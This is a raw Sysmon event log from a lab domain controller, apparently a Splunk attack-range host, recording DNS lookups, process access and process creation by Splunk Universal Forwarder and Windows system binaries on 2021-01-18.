14:00:46.419{59A5CD1D-8E56-6005-2E00-00000000A301}2464113.7.86.99.in-addr.arpa.0type: 12 server-99-86-7-113.fra6.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.417{59A5CD1D-8E56-6005-2E00-00000000A301}2464219.220.186.35.in-addr.arpa.0type: 12 219.220.186.35.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000018042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.416{59A5CD1D-8E56-6005-2E00-00000000A301}246480.207.58.216.in-addr.arpa.0type: 12 fra16s25-in-f16.1e100.net;C:\Windows\sysmon64.exe 10341000x800000000000000018041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.237{59A5CD1D-948E-6005-4205-00000000A301}56524564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.074{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-948E-6005-4205-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000018039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.072{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.072{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:47.072{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.072{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.072{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-948E-6005-4205-00000000A301}5652C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:47.072{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-948E-6005-4205-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.928{59A5CD1D-948E-6005-4205-00000000A301}5652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.995{59A5CD1D-9490-6005-4405-00000000A301}68684436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.824{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9490-6005-4405-00000000A301}6868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:48.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:48.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.822{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9490-6005-4405-00000000A301}6868C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.821{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9490-6005-4405-00000000A301}6868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.679{59A5CD1D-9490-6005-4405-00000000A301}6868C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x800000000000000018057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.426{59A5CD1D-8E56-6005-2E00-00000000A301}2464234.63.190.35.in-addr.arpa.0type: 12 234.63.190.35.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000018056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.419{59A5CD1D-8E56-6005-2E00-00000000A301}2464182.169.202.18.in-addr.arpa.0type: 12 ec2-18-202-169-182.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.419{59A5CD1D-8E56-6005-2E00-00000000A301}2464163.253.35.13.in-addr.arpa.0type: 12 server-13-35-253-163.fra6.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:46.419{59A5CD1D-8E56-6005-2E00-00000000A301}2464163.100.84.104.in-addr.arpa.0type: 12 a104-84-100-163.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 10341000x800000000000000018053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.176{59A5CD1D-9490-6005-4305-00000000A301}70765908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.017{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9490-6005-4305-00000000A301}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.016{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:48.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.015{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9490-6005-4305-00000000A301}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.015{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9490-6005-4305-00000000A301}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:48.015{59A5CD1D-9490-6005-4305-00000000A301}7076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 